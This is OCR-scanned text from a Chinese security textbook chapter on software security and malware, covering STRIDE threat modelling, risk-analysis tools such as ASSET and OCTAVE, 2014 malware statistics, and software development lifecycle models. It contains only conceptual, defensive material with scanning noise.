10. 简 述 攻击 者 使 用 JavaScript 脚本 获取 受害 者 Cookie 的 过 程 。 
11. Web 服务 器 端 可 采用 哪些 方式 避免 XSS 攻击 ? 
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软件 安全 与 恶意 代码 


本 章 学 习 要 点 : 

如 软件 安全 的 概念 以 及 当前 软件 安全 威胁 的 主要 来 源 ; 

名 软件 安全 风险 分 析 的 过 程 ,特别 是 微软 STRIDE 成 胁 建 模 方法 ; 

如 安全 软件 开发 生命 周期 的 构成 方式 以 及 主要 步骤 ; 

后 恶意 软件 的 定义 ,特别 是 病毒 ,蠕虫 和 木马 三 者 的 机 理 与 防治 技术 。 


9.1 软件 安全 概述 


软件 安全 (Software Security) 是 指 : 采取 工程 的 方法 使 得 软件 在 敌对 攻击 的 情况 下 
仍 继续 正常 工作 。 即 采用 系统 化 ,规范 化 、 数 量化 的 方法 来 指导 构建 安全 的 软件 。 

软件 安全 是 一 个 相对 较 新 的 领域 ,直到 2001 年 才 出 现 了 软件 安全 方面 的 研究 成 果 ， 
这 说 明 开发 人 员 ,软件 架构 师 、 计 算 机 科学 家 们 才 开 始 系统 地 思考 如 何 构 建安 全 软件 。 这 
方面 的 实践 准则 还 没有 得 到 广泛 的 推广 和 普遍 采用 。 

从 风险 分 析 的 角度 出 发 ,软件 安全 是 关于 如 何 理 解 软 件 所 引起 的 安全 风险 以 及 如 何 
管理 这 些 风险 的 学 科 。McGraw 博士 提出 “使 安全 成 为 软件 开发 的 必需 部 分 (Build 
Security In,BSD ”的 观点 ,已 经 得 到 业界 和 政府 机 构 的 认同 ,美国 国土 安全 部 下 属 的 国家 
网 络 安全 处 专门 建立 了 BSI 网 站 (http://buildsecurityin. us-cert. gov/protal) ,并 与 美国 
标准 技术 研究 所 (NIST) .国际 标准 化 组 织 (ISO) 以 及 电气 电子 工程 师 协会 (IEEE) 一 起 共 
同 维护 这 个 网 站 。 

McGraw 博士 提出 软件 安全 工程 化 的 三 个 支柱 : 风险 管理 .软件 安全 切入 点 以 及 安 
全 知识 。 软 件 安 全 切入 点 是 在 软件 开发 生命 周期 中 保障 软件 安全 的 一 套 最 佳 实际 操作 方 
法 ,这 其 中 包括 代码 审核 ,体系 结构 风险 分 析 渗透 测试 .基于 风险 的 安全 测试 .滥用 案例 、 
安全 需求 和 安全 操作 。 

软件 安全 是 计算 机 安全 问题 中 的 一 个 关键 问题 。 软 件 的 缺陷 ,包括 实现 中 的 错误 (如 
缓冲 区 溢出 ), 以 及 设计 中 的 错误 (如 不 周全 的 错误 处 理 ) ,已 经 出 现 很 多 年 了 。 同 时 ,黑客 
常常 通过 利用 软件 漏洞 入 侵 到 系统 中 。 因 此 ,近年 来 基于 互联 网 的 应 用 软件 往往 成 为 风 
险 最 高 的 软件 。 同 时 随 着 软件 系统 的 不 断 增 加 和 越 来 越 复杂 ,使 得 安全 隐患 也 不 断 增多 。 
据 统计 ,软件 中 的 安全 漏洞 逐年 增长 。 

最 近 ,360 互联 网 安全 中 心 给 出 了 2014 年 度 中 国 个 人 电脑 上 网 安全 报告 : 
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2014 年 ,360 共 截 获 新 增 恶意 程序 样本 3. 24 亿 个 ,平均 每 天 截获 新 增 恶意 程序 样本 
88. 8 万 个 。 恶 意 程序 在 个 人 电脑 上 最 主要 的 4 个 传播 途径 分 别 是 : 聊天 工具 、 流 良 推 广 、 
外 挂 程序 和 色情 网 站 。 在 通过 QQ 传输 的 可 执行 文件 中 ,14% 为 恶意 程序 ;而 在 通过 旺旺 
传输 的 可 执行 文件 中 ,10% 为 恶意 程序 。 在 所 有 采用 流 良 推 广 方式 的 恶意 程序 中 ,播放 器 
占 到 了 52.7%, 其 次 是 各 种 安装 包 (20.7%)、 外 挂 程序 (8. 1%)。17% 的 游戏 外 挂 为 带 毒 
外 挂 。 其 中 ,QQ 游戏 系列 的 外 挂 的 带 毒 率 约 为 32%, 跑 跑 卡 丁 车 外 挂 带 毒 率 约 为 50%。 
这 些 带 毒 外 挂 的 恶意 行为 包括 盗号 感染 文件 、 流 误 推 广 、 自 改 首页 等 。2014 年 ,360 共 截 
获 新 增 挂 马 网 站 1468 个 ,平均 每 天 截获 新 增 挂 马 网 站 4 个 。360 共 截获 新 增 钓 鱼网 站 
262. 1 万 个 ,平均 每 天 截获 新 增 钓 鱼网 站 约 7080 个 。 


与 此 同时 ,由 于 Windows XP 停 服 可 能 直接 影响 国内 3 亿 用 户 的 电脑 安全 ,因此 ,对 
于 Windows XP 系统 的 安全 防护 就 成 为 国内 安全 产业 面临 的 严峻 挑战 。 
表 9-1 给 出 了 2014 年 排名 前 10 的 攻击 次 数 最 多 的 恶意 程序 名 称 和 具体 的 恶意 行为 。 


表 9-1 2014 年 个 人 电脑 恶意 程序 攻击 次 数 TOP 10 
恶意 程序 类 别名 称 攻击 次 数 恶意 行为 


运行 后 以 隐藏 弹 窗 形 式 , 在 后 台 恶 意 刷 流量 ,如 果 用 


ADWare. Win32. Clicker 2 421 545 599 户 电脑 补丁 不 全 很 可 能 会 感染 网 页 上 的 木马 


LPK 感染 ,通过 系统 优先 加 载 程序 自身 目录 DLL 的 


Virus. Win32. FakeLPK 1 011 808 088 特性 启动 自身 ,并 不 断 复制 自身 感染 用 户 电脑 


可 被 利用 的 驱动 ,恶意 软件 可 利用 该 驱动 达到 隐藏 


Rootkit. Win32. Rwm 374 539 336 自身 目的 , 因 其 代码 运行 在 特权 模式 下 ,可 造成 意 想 
不 到 的 伤害 

ADWare. Win32. Acad( NotPe) | 361 942 877 恶意 修改 用 户 浏 览 器 默认 主页 ,弹出 恶意 \ 虚 假 广告 
页 面 等 
DDoS 木马 ,中 招 后 电脑 即 变 成 被 黑客 控制 的 僵尸 电 

Trojan. Win32. DDOS 292 049 365 “| 脑 。 黑 客 可 以 利用 僵尸 电脑 来 发 起 DDoS 攻击 ,在 攻 


击 过 程 中 ,用 户 电脑 会 出 现 卡 、 网 络 慢 、 掉 线 等 现象 


广告 软件 ,安装 该 类 型 软件 后 通常 会 默认 添加 自 启 
ADWare. Win32. MultiDL 214 904 138 ”| 动 , 随 着 系统 运行 常 驻 进 程 ,并 在 后 台 根 据 云 端 下 发 
各 种 类 型 的 广告 


Linkinfo 感染 ,通过 系统 优先 加 载 程序 自身 目录 DLL 


Virus. Win32. Fakelinkinfo 172 978 834 的 特性 启动 自身 ,并 不 断 复制 自身 感染 用 户 电脑 


游戏 木马 , 盗 取 用 户 游戏 信息 后 发 送 到 黑客 事先 拱 
Trojan. Win32. GameHacker 115 951 992 建 好 的 收 信 地 址 ,黑客 会 通过 洗 掉 用 户 号 里 的 金币 


装备 来 获取 利润 
假冒 文件 夹 图 标 迷 惑 用 户 , 运 行 后 会 启动 感染 模式 ， 
Virus. Win32. FakeFolder 114 521 827 不 断 复制 自身 到 各 个 文件 夹 下 
远程 注入 系统 正常 进程 ,修改 EIP 来 执行 自身 事先 
Trojan. Win32. Inject 91 454 529 准备 的 恶意 代码 ,这 种 特性 使 得 用 户 在 任务 管理 器 


是 无 法 结束 该 病毒 的 
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描述 性 知识 类 包括 三 种 知识 : 原则 、 方 针 和 规则 。 原 则 和 方针 是 从 方法 论 的 高 度 
(高 层 体系 结构 角度 ) 进 行 定 义 和 描 述 , 规 则 是 从 代码 级 角度 进行 有 针对 性 的 抽象 和 统 
一 。 描 述 性 知识 类 提供 了 一 些 建议 , 旨 在 说 明 该 做 什么 和 在 构建 安全 的 软件 时 应 该 避 
免 什么 。 

诊断 性 知识 包括 三 种 知识 : 攻击 模式 、 攻 击 程序 和 弱点 。 诊 断 性 知识 不 仅 包括 关于 
实践 的 描述 性 陈述 ,其 更 重要 的 目标 是 帮助 操作 人 员 识 别 和 处 理 导致 安全 攻击 的 常见 
问题 。 

(1) 攻击 模式 采用 较 抽 象 的 形式 来 描述 常见 的 攻击 程序 ,这 种 形式 能 够 应 用 于 跨越 
多 个 系统 的 情形 , 即 在 多 个 系统 中 均 存在 的 攻击 模式 ,该 知识 可 被 安全 分 析 人 员 所 利用 ， 
基于 滥用 案例 的 可 靠 性 检测 等 。 

(2) 攻击 程序 描述 了 弱点 实例 如 何 被 用 来 对 特定 系统 造成 特别 的 安全 危害 。 

(3) 弱点 知识 是 对 真实 系统 中 出 现 过 并 报告 的 软件 弱点 的 描述 ,比较 著名 的 弱点 和 
攻击 知识 库 包 括 : MITRE 的 CVE、CERIAS 数据 库 以 及 CERT 警报 库 。 

历史 知识 类 包括 历史 风险 ,在 有 些 情形 下 也 包括 有 弱点 的 历史 数据 库 。 这 类 知识 还 
包括 对 在 实际 的 软件 开发 中 所 发 现 的 特定 问题 的 详细 描述 ,以 及 该 问题 产生 的 影响 。 

总 之 ,描述 性 知识 从 战略 的 角度 进行 描述 ,主要 包含 一 些 长 期 积累 和 提炼 出 来 相对 抽 
象 的 元 知识 。 诊 断 性 知识 从 战术 的 角度 进行 描述 ,可 能 与 具体 系统 相关 ,攻击 模式 和 程序 
从 攻击 的 角度 描述 ,弱点 从 防御 的 角度 描述 。 历 史 知 识 库 是 知识 的 历史 积累 和 前 后 关联 
的 总 结 。 
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安全 软件 开发 的 体系 安全 需要 考虑 安全 风险 分 析 、 威 胁 建 模 、 安 全 风险 管理 3 个 方 
面 。 风 险 分 析 表 示 在 软件 开发 生命 周期 的 多 个 阶段 中 (如 需求 阶段 或 测试 阶段 等 ) ,确定 
风险 和 对 风险 评级 的 活动 。 风 险 管理 指 对 大 量 不 连续 的 风险 分 析 操 作 、 在 整个 开发 过 程 
中 追踪 风险 ,以 及 降低 风险 的 策略 性 活动 。 

软件 体系 安全 分 析 方法 主要 有 3 个 关键 步骤 , 即 抗 攻击 分 析 、 不 确定 性 分 析 、 弱 点 
分 析 。 

(1) 抗 攻击 分 析 主 要 分 析 对 已 知 的 攻击 、 攻 击 模式 和 弱点 的 抗 攻击 能 力 , 通 常 采用 清 
单 的 方式 ,例如 STRIDE 方法 。 

(2) 不 确定 性 分 析 主 要 针对 发 现 新 的 风险 .创造 性 要 求 较 高 ,需要 有 经 验 的 分 析 人 员 
参与 。 
(3) 弱点 分 析 是 指 分 析 软 件 所 依赖 的 外 部 软件 的 弱点 。 
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1. NIST 的 ASSET 
自动 安全 自 评估 工具 (Automated Security Self-Evaluation Tool,ASSET) 由 NIST 
提出 。ASSET 能 自动 完成 NIST 800-26 信息 系统 安全 自我 评估 指南 中 包含 的 调查 表 , 调 
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查 表 的 结果 提供 了 一 种 评价 特定 系统 安全 的 方法 。 通 过 对 调查 表 的 解释 ,用 户 可 以 评估 
组 织 内 的 信息 系统 安全 ,以 及 组 织 安全 项 目 规划 的 安全 性 。 

ASSET 包含 两 种 工具 : ASSET 系统 和 ASSET 管理 者 。 在 ASSET 系统 中 ,调查 表 
以 一 种 递 进 的 方式 呈现 ,允许 用 户 在 调查 表 中 向 前 或 向 后 移动 。ASSET 管理 者 提供 排 
序 和 总 结 调查 表 结 果 的 能 力 ,并 通过 输出 端口 或 格式 化 表 显 示 结 果 。ASSET 系统 允许 
用 户 通过 保存 评估 状态 返回 到 评级 。 一 旦 评级 完成 ,用 户 可 以 产生 被 评级 系统 的 评估 
结果 。 

ASSET 系统 提供 4 种 报告 的 能 力 , 这 4 种 报告 是 : 根据 有 效 性 进行 主题 领域 的 总 
结 、 非 可 应 用 问题 列表 、 基 于 风险 的 决策 列表 、 系 统 总 结 报告 。ASSET 管理 者 也 提供 了 4 
种 报告 : 所 有 系统 的 总 结 、 根 据 类 型 进行 系统 列表 、 系 统 敏 感 程度 列表 、 组 织 总 结 。 

2. CMU SEI 的 OCTAVE 

卡耐基 梅 隆 大 学 软件 工程 研究 院 (CMU SEI) 提 出 的 操作 型 关键 威胁 ,评级 以 及 漏洞 
评估 (Operationally Critical Threat, Asset, and Vulnerability Evaluation ,OCTAVE) 系 
统 。 它 是 一 个 标识 和 管理 信息 安全 风险 的 框架 ,由 一 套 基 于 风险 的 信息 安全 策略 评价 和 
规划 工具 、 技 术 和 方法 组 成 。 它 定义 了 一 种 允许 组 织 标识 信息 资产 的 综合 评估 方法 ,对 这 
些 资产 的 威胁 以 及 弱点 ,使 得 组 织 能 够 知道 什么 信息 存在 风险 ,从 而 设计 和 实现 保护 策略 
来 减少 信息 资产 的 整体 风险 。 

OCTAVE 方法 使 用 三 阶段 方法 来 检查 组 织 和 技术 问题 ,综合 了 组 织 内 各 种 信息 安 
全 的 需求 。 它 由 一 系列 研讨 会 组 成 ,通过 3 一 5 个 组 织 内 人 员 组 成 分 析 团 队 进 行 实施 。 这 
种 方法 利用 了 来 自 不 同 级 别人 员 的 知识 ,并 主要 关注 : 发 现 关键 的 评估 标准 以 及 对 这 些 
评估 的 威胁 ;发 现 人 员 组 织 上 和 技术 上 的 弱点 ,面临 的 威胁 、 风 险 。 开 发 基于 实践 的 保护 
策略 ,抵御 风险 的 规划 优先 级 等 。 
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商业 化 的 软件 安全 风险 分 析 包括 : 微软 公司 的 STRIDE, Cigital 公司 的 体系 结构 风 
险 分 析 过 程 ,以 及 SUN 公司 的 ACSM/SAR 等 。 这 里 以 STRIDE 方法 为 例 进行 介绍 。 

1. STRIDE 威胁 模型 

STRIDE 建 模 方法 由 微软 公司 提出 ,该 方法 通过 审查 系统 设计 或 架构 来 发 现 或 纠正 
设计 级 (design-level) 的 安全 问题 。 它 是 Microsoft SDL 的 一 部 分 。 在 设计 安全 软件 时 ， 
不 同 部 门 对 安全 的 理解 不 同 。 软 件 开发 人 员 认 为 安全 主要 是 指 代码 质量 ,网 络 管理 员 认 
为 安全 主要 是 防火 墙 . 事 件 响应 ,以 及 系统 管理 。 学 术 界 认为 安全 是 指 Saltzer 和 
Schroeder 原则 。 因 此 ,必须 首先 明确 什么 是 安全 。 

安全 的 含义 包括 机 密 性 、 完 整 性 、 可 用 性 、 对 用 户 正 确 进行 身份 验证 和 授权 以 及 事务 
处 理 不 可 否认 等 , 表 9-2 介绍 了 每 个 属性 。 

针对 这 些 安全 属性 ,给 出 STRIDE 威胁 模型 .STRIDE 是 6 种 威胁 类 型 的 英文 首 字 
母 缩写 ,这 6 种 威胁 如 下 : 

(1) 欺骗 证 识 (Spoofing identity) ,典型 的 例子 是 使 用 其 他 用 户 的 认证 信息 进行 非法 
访问 。 例 如 利用 用 户 名 和 口令 等 认证 信息 进行 非法 访问 。 
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表 9-2 常见 安全 属性 


属 性 说 了 明 
机 密 性 (confidentiality) 数据 只 限 应 具有 权限 的 人 员 访 问 
完整 性 (integrity) 数据 和 系统 资源 只 限 适当 的 人 员 以 适当 的 方式 进行 更 改 
可 用 性 (availability) 系统 在 需要 时 一 切 就 绪 , 可 以 正常 执行 操作 
身份 验证 (authentication) 建立 用 户 身份 (或 者 接受 匿名 用 户 ) 
授权 (authorization) 明确 允许 或 拒绝 用 户 访问 资源 
不 可 否认 (nonrepudiation) 用 户 无 法 在 执行 某 操作 后 否认 执行 了 此 操作 


(2) 算 改 数据 (Tempering with data) ,在 未 授权 的 情况 下 恶意 地 修改 数据 。 这 种 修 
改 可 能 是 在 数据 库 中 保存 的 数据 ,也 可 能 是 在 网 络 中 传输 的 数据 。 

(3) 可 抵赖 (Repudiation) ,用 户 从 事 一 项 非法 操作 ,但 该 用 户 拒绝 承认 , 且 没 有 方法 
可 以 证 明 他 是 在 抵赖 。 例 如 某 用 户 从 事 一 项 非法 操作 ,但 系统 又 缺乏 跟踪 非法 操作 的 
功能 。 

(4) 信息 泄露 (Information disclosure) ,信息 暴露 给 不 允许 对 它 访问 的 人 。 例 如 用 户 
读 到 没有 给 他 赋予 访问 权限 的 文件 的 内 容 , 信 息 在 网 络 中 传递 时 内 容 被 泄密 。 

(5) 拒绝 服务 (Denial of Service) ,拒绝 对 正当 用 户 的 服务 。 例 如 Web 服务 器 短 时 间 
不 可 以 访问 ,可 能 是 遭 到 拒绝 服务 攻击 ,因此 需要 提高 系统 的 可 用 性 和 可 靠 性 。 

(6) 权限 提升 (Elevation of privilege) ,一 个 没有 特权 的 用 户 获得 访问 特权 ,从 而 有 足 
够 的 权限 做 出 摧毁 整个 系统 的 事情 。 例 如 一 名 攻击 者 已 经 有 效 地 穿 透 了 所 有 的 系统 防 
御 ,成 为 了 受信 任 的 一 部 分 。 

表 9-3 将 STRIDE 映射 到 每 个 安全 属性 上 。 

表 9-3 将 威胁 映射 为 防护 它们 的 安全 属性 


威 ” 胁 安全 性 属性 威胁 安全 性 属性 
假冒 (Spoofing) 身份 验证 | 信息 泄露 (Information disclosure) 机 密 性 
复 改 (Tempering) 完整 性 拒绝 服务 (Denial of Service) 可 用 性 
可 抵赖 (Repudiation) 不 可 否认 | 提升 权限 (Elevation of privilege) 授权 


2. 威胁 建 模 的 过 程 

威胁 建 模 的 过 程 主 要 有 4 个 方面 。 

。 发现 已 知 的 对 系统 的 威胁 。 

。 将 威胁 以 风险 从 高 到 低 排序 。 

。 确定 减少 威胁 的 技术 。 

。 选择 合适 的 技术 。 

以 上 过 程 可 能 反复 进行 多 次 ,因为 一 次 标识 所 有 可 能 的 威胁 是 很 困难 的 。 同 时 ,技术 
随时 间 而 改变 ,新 的 问题 不 断 产 生 , 可 能 导致 新 的 威胁 。 同 时 ,存在 的 威胁 也 可 能 变 得 无 
害 。 下 面 分 别 就 这 4 个 方面 进行 介绍 。 
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(1) 发 现 已 知 的 对 系统 的 威胁 。 到 目前 为 止 ,将 STRIDE 模型 应 用 到 应 用 程序 中 最 
简单 的 方法 是 ,考虑 模型 中 的 每 一 个 威胁 是 如 何 影响 每 一 个 解决 方案 组 件 的 ,以 及 如 何 影 
响 解 决 方案 组 件 与 其 他 解决 方案 组 件 之 间 的 每 一 个 连接 或 关系 的 。 观 察 应 用 程序 的 每 一 
部 分 ,为 组 件 或 进程 判断 是 否 有 任何 STR、I.D 或 者 下 威胁 存在 。 大 部 分 都 会 存在 许 
多 威胁 ,将 它们 都 记录 下 来 是 很 重要 的 。 

例如 : 对 基于 Web 的 工资 应 用 程序 的 一 些 威 胁 , 包 括 如 下 几 方 面 。 

威胁 1: 一 个 恶意 用 户 , 在 从 Web 服务 器 到 客户 端的 途中 ,或 在 从 客户 端 到 Web 服 
务 器 的 途中 ,查看 或 者 算 改 个 人 工资 数据 。( 算 改 数据 /信息 泄露 ) 

威胁 2: 一 个 恶意 用 户 , 在 从 Web 服务 器 到 COM 组 件 的 途中 ,或 在 从 COM 组 件 到 
Web 服务 器 的 途中 ,查看 或 自 改 个 人 工资 数据 。( 算 改 数 据 / 信 息 泄露 ) 

威胁 3: 一 个 恶意 用 户 , 直 接 在 数据 库 中 访问 或 算 改 工资 数据 。( 自 改 数 据 /信息 泄露 ) 

威胁 4: 一 个 恶意 用 户 , 查 看 LDAP 认证 包 , 并 学 习 如 何 恢复 它们 ,以 便 他 能 够 冒充 
别 的 用 户 。( 欺 骗 标识 /信息 泄露 /特权 提升 (如 果 认 证 数据 是 一 名 管理 员 )) 

威胁 5: 一 个 恶意 用 户 ,通过 改变 一 个 或 多 个 Web 页 ,来 丑化 Web 服务 器 。( 自 改 数据 ) 

威胁 6: 一 名 攻击 者 通过 发 送 大 量 的 TCP/IP 包 , 使 工资 数据 库 服务 器 计算 机 拒绝 访 
问 。(DoS) 

威胁 7: 一 名 攻击 者 删除 或 者 修改 审核 日 志 。( 算 改 数据 /拒绝 履约 ) 

威胁 8: 一 名 攻击 者 使 用 分 布 式 DoS 攻击 , 杀 死 真正 的 工资 服务 器 后 ,将 他 自己 的 工 
资 Web 服务 器 放 在 网 络 上 。( 欺 骗 标识 ,另外 ,一 个 特别 有 恶意 的 用 户 通过 窃取 口令 或 其 
他 认证 数据 删除 数据 等 ,可 以 发 起 所 有 的 威胁 ) 

上 述 是 一 个 精简 的 列表 ,实际 上 还 有 很 多 威胁 没有 列 出 。 在 讨论 威胁 时 ,记录 下 所 有 
被 推理 出 来 的 攻击 ,不 论 某 个 攻击 看 起 来 是 不 是 荒唐 的 ,都 应 该 记录 。 即 使 是 荒唐 的 攻击 
也 有 可 能 成 为 真实 的 攻击 。 在 威胁 文档 中 注释 出 发 生 这 个 威胁 的 机 会 。 

(2) 将 风险 从 高 到 低 排序 。 对 每 个 服务 器 中 的 资产 ,通过 以 下 方式 决定 优先 级 别 : 

攻击 发 生 的 概率 , 即 需要 多 少 努力 ,代价 .时 间 来 发 起 攻击 ,1 二 高 概率 , 10== 低 概率 

一 旦 攻击 发 生 , 将 会 带 来 什么 破坏 和 损失 ? 1 一 小 损失 , 10 一 大 损失 

风险 = 攻击 发 生 后 的 损失 /攻击 的 概率 ,1 一 小 风险 , 10 一 大 风险 

为 了 减少 风险 ,通常 首先 处 理 高 风险 的 项 目 , 表 9-4 中 给 出 的 比例 可 以 作为 参考 。 


表 9-4 主要 威胁 导致 的 弱点 在 攻击 中 占 的 比例 


弱 点 占 攻击 的 比例 

可 旁 路 的 限制 (restrictions that can be bypassed) 20% 
参数 检查 (argument checking) 19% 
没有 检查 的 缓冲 区 (unchecked buffer) 18% 
不 正确 的 控制 标记 (incorrect control marking) 10% 
不 正确 的 许可 (incorrect permissions) 9% 

架构 错误 (architectural error) 6% 

实现 错误 (other implementation error) 18% 
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(3) 确定 防御 威胁 的 相关 技术 , 表 9-5 给 出 了 与 威胁 相关 的 防御 技术 。 
表 9-5 防御 各 个 威胁 的 技术 


威胁 类 型 防御 技术 
认证 (authentication) 
身份 假冒 (spoofing identity) 保护 秘密 (protect secrets) 
不 保存 秘密 (do not store secrets) 
授权 (authorization) 
哈 希 函数 (hashes) 
算 改 数据 (tampering with data) 消息 认证 码 (message authentication codes) 


数字 签名 (digital signatures) 
防 算 改 协议 (tamper-resistant protocols) 


签名 (digital signatures) 
否认 (repudiation) 时 间 戳 (timestamps) 
审计 跟踪 (audit trails) 


授权 (authorization) 

隐私 保护 协议 (privacy-enhanced protocols) 
信息 泄露 (information disclosure) 加 密 (encryption) 

保护 秘密 (protect secrets) 

不 保存 秘密 (do not store secrets) 


认证 (authentication) 

授权 (authorization) 
拒绝 服务 攻击 (denial of service) 过 滤 (filtering) 

流量 控制 (throttling) 

服务 质量 (quality of service) 


权限 提升 (elevation of privilege) 最 小 权限 运行 (run with least privilege) 


(4) 选择 合适 的 技术 。 例 如 使 用 Windows 集成 的 安全 技术 Kerberos ,或 者 Windows 
认证 来 安全 访问 数据 库 ,使 用 访问 控制 日 志 (Access Control Logs,ACL) ,安全 套 接 字 层 
(Secure Socket Layer,SSL) ,传输 层 安 全 (Transport Layer Security,TLS) ,以 及 IPSec 
认证 。 
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931 传统 软件 开发 生命 周期 


下 面 首先 介绍 传统 的 软件 开发 生命 周期 ,以 便于 思考 如 何在 传统 软件 开发 生命 周期 
加 入 对 安全 的 考虑 和 处 理 。 下 面 列举 出 常见 的 传统 软件 开发 生命 周期 。 

1. 瀑布 模型 

瀑布 模型 是 1970 年 由 W. Royce 最 早 提出 的 软件 开发 模型 。 它 将 软件 生命 周期 的 
各 项 活动 规定 为 一 定 顺序 链接 的 若干 阶段 工作 ,这 些 工 作 之 间 的 衔接 关系 从 上 到 下 、 不 可 
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统 转 , 如 同 瀑布 一 样 ,因此 称 为 瀑布 模型 。 传 统 的 瀑布 模型 将 软件 开发 过 程 划 分 成 若干 个 
互相 区 别 而 又 彼此 联系 的 阶段 ,这 几 个 阶段 分 别 为 : 可 行 性 研究 与 计划 、 需 求 分 析 、 软 件 
设计 ,编程 测试、 运行 和 维护 ,每 个 阶段 的 工作 都 是 以 上 一 个 阶段 工作 的 结果 为 依据 , 同 
时 又 为 下 一 个 阶段 的 工作 提供 前 提 , 如 图 9-1 所 示 。 


可 行 性 研究 与 “| 可 行 性 
计划 研究 报告 


需求 分 析 。 | 需求 说 明 书 


! 


软件 设计 。 上 一 涉及 文档 
二 一 一 程序 
一 一 测试 报告 
tr 
图 9-1 瀑布 模型 


瀑布 模型 的 顺序 活动 的 特点 ,使 得 软件 开发 人 员 在 进行 开发 活动 时 ,必须 按照 阶段 顺 
序 安 排 工作 ,避免 了 软件 开发 人 员 接 到 任务 后 ,急于 开始 写 程序 ,而 忽略 了 前 期 的 各 项 准 
备 工作 。 为 了 提高 软件 质量 ,在 瀑布 模型 中 要 求 每 个 阶段 的 工作 都 要 有 完整 ,准确 的 文档 
资料 ,并且 每 个 阶段 结束 前 都 要 对 文档 进行 审查 ,尽早 发 现 问题 ,尽早 解决 。 瀑 布 模型 自 
提出 以 来 ,一 直 是 一 种 被 广泛 采用 的 开发 模型 , 它 配 合 结构 化 方法 和 严格 的 软件 开发 管理 
手段 ,在 软件 工程 化 开发 中 起 到 了 重要 的 作用 。 但 是 在 经 过 长 期 的 实践 活动 中 ,瀑布 模型 
也 暴露 出 了 如 下 一 些 缺 点 。 

在 项 目 开始 阶段 ,开发 人 员 和 用 户 对 需求 的 描述 常常 是 不 全 面 的 。 开 发 人 员 通 常 对 
项 目 所 涉及 的 领域 不 了 解 , 所 以 理解 上 难免 会 出 现 遗 漏 或 者 偏差 ,就 会 影响 到 后 面 的 
工作 。 

瀑布 模型 是 由 文档 驱动 的 。 瀑 布 模型 中 的 各 个 阶段 所 做 的 工作 都 是 文档 说 明 。 当 用 
户 在 使 用 软件 时 往往 会 产生 一 些 新 的 想法 ,或 许 会 对 软件 的 使 用 方面 提出 一 些 建议 ,而 此 
时 想 对 系统 修改 难度 会 很 大 。 

开发 过 程 中 ,事先 选择 的 技术 或 需求 迅速 发 生变 化 ,需要 返回 到 前 面 某 个 阶段 ,对 前 
面 的 一 系列 内 容 进 行 修改 ,这 样 势必 会 影响 整个 软件 开发 进度 。 

2. 原型 模型 (快速 原型 模型 ) 

原型 模型 的 基本 思想 是 : 软件 开发 人 员 在 与 用 户 进行 需求 分 析 时 ,以 比较 小 的 代价 
快速 建立 一 个 能 够 反映 用 户主 要 需求 的 原型 模型 ,让 用 户 在 计算 机 上 进行 操作 ,然后 提出 
改进 意见 。 开 发 人 员 根 据 用 户 的 建议 .对 原型 进行 补充 和 完善 ,然后 青 由 用 户 试 用 、 评 价 、 
提出 意见 ,重复 这 一 过 程 ,直至 用 户 满意 为 止 ,如 图 9-2 所 示 。 开 发 人 员 根 据 原型 书写 说 
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明文 档 , 作 为 后 面 开发 工作 的 依据 。 


修改 列表 | | 修改 列表 |- | 修改 列表 
修改 原型 | 。 | 用 户 /顾客 评审 修改 原型 | “| 用 户 /顾客 评审 
需求 原型 化 |- -| 设计 原型 化 | 一 | 系统 奈 列 化 |- -| ”测试 
系统 需求 ee 
( 非 正式 ) 可 交 仁 全 用 的 
图 9-2 原型 模型 
采用 原型 模型 具有 以 下 优点 : 


(1) 原型 模型 让 用 户 有 机 会 实践 系统 的 基本 功能 ,因而 可 以 对 不 尽 合理 的 内 容 提出 
修改 意见 和 建议 。 

(2) 原型 模型 可 以 使 开发 者 和 用 户 充分 交流 ,对 一 些 模糊 需求 也 能 够 处 理 。 

(3) 开发 人 员 通 过 建立 原型 模型 对 系统 有 了 更 深层 次 的 理解 ,在 设计 和 编码 时 可 以 
尽量 减少 出 错 , 有 助 于 软件 的 开发 工作 顺利 进行 。 

(4) 用 户 在 使 用 原型 模型 时 已 经 对 系统 有 了 初步 了 解 ,因此 ,建立 模型 的 过 程 也 相当 
是 用 户 的 一 个 学 习 软 件 的 过 程 。 

(5) 原型 模型 特别 适合 人 机 界面 的 ,用 户 通过 交互 界面 的 内 容 , 能 够 提出 有 关 操作 、 
功能 上 的 建议 ,而 对 一 些 类 似 实时 控制 软件 .嵌入 式 软件 则 不 合适 。 

(6) 原型 模型 可 以 使 用 户 对 系统 更 为 满意 ,也 有 利于 维护 。 

3. 渐进 模型 

渐进 模型 的 目的 是 和 客户 一 起 工作 ,从 最 初 的 大 概 的 需求 说 明 演 化 出 最 终 的 系统 。 
渐进 模型 的 目的 是 逐渐 理解 需求 , 没 必要 一 次 性 完全 理解 需求 ,如 图 9-3 所 示 。 


用 户 用 户 反 馈 用 户 反馈 用 户 
需求 原型 1 原型 2 ”上 -一 一 | 最 终 的 系统 
图 9-3 渐进 模型 


渐进 模型 存在 的 问题 在 于 缺乏 过 程 的 可 见 性 ,系统 通常 不 能 够 很 好 地 结构 化 。 如 果 
需要 使 系统 结构 化 ,可 能 需要 特许 技巧 (例如 ,使 用 快速 原型 语言 )。 渐 进 模型 的 一 般 应 用 
在 中 小 型 规模 的 交互 式 系统 或 大 型 系统 的 一 部 分 (例如 ,用 户 接 口 ) 或 生命 周期 较 短 的 
系统 。 


932 安全 软件 开发 生命 周期 
安全 软件 的 开发 生命 周期 (Secure Software Development Lifecycle,SSDL) 旨 在 通过 
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软件 开发 的 各 个 步骤 来 确保 软件 的 安全 性 ,其 目标 是 确保 安全 的 软件 得 以 成 功 实现 。 通 
常 由 5 个 主要 部 分 组 成 。 

1. 安全 原则 、 规 则 及 规章 

安全 原则 规则 和 规章 通常 被 视 为 保护 性 需求 。 该 阶段 应 创建 一 份 系统 范围 内 的 规 
范 , 其 中 定义 将 应 用 到 本 系统 的 安全 需求 ,此 规范 也 可 以 通过 特定 的 官方 规章 来 定义 ,如 
OWA SP 的 Web 应 用 程序 安全 标准 (WASS) ,支付 卡 行业 数据 安全 标准 (Payment Card 
Industry Data Security Standard) ,金融 现代 化 条 例 (The Graham-Leech-Bliley) 等 。 若 软 
件 系统 需要 遵循 这 些 特定 行业 的 安全 标准 ,在 需求 分 析 时 就 要 考虑 到 这 些 要 求 。 若 某 些 
系统 不 受 任何 规则 条 例 的 影响 , 则 仍然 应 该 开发 一 个 安全 策略 ,这 些 安全 策略 要 以 文档 的 
形式 记录 下 来 ,并 通过 对 其 跟踪 和 评估 ,使 其 成 为 一 个 不 断 发 展 的 基本 规则 。 

2. 安全 需求 工程 

这 里 通常 是 特定 功能 需求 所 需 的 特有 安全 需求 ,这 些 安 全 需求 有 别 于 系统 范围 的 安 
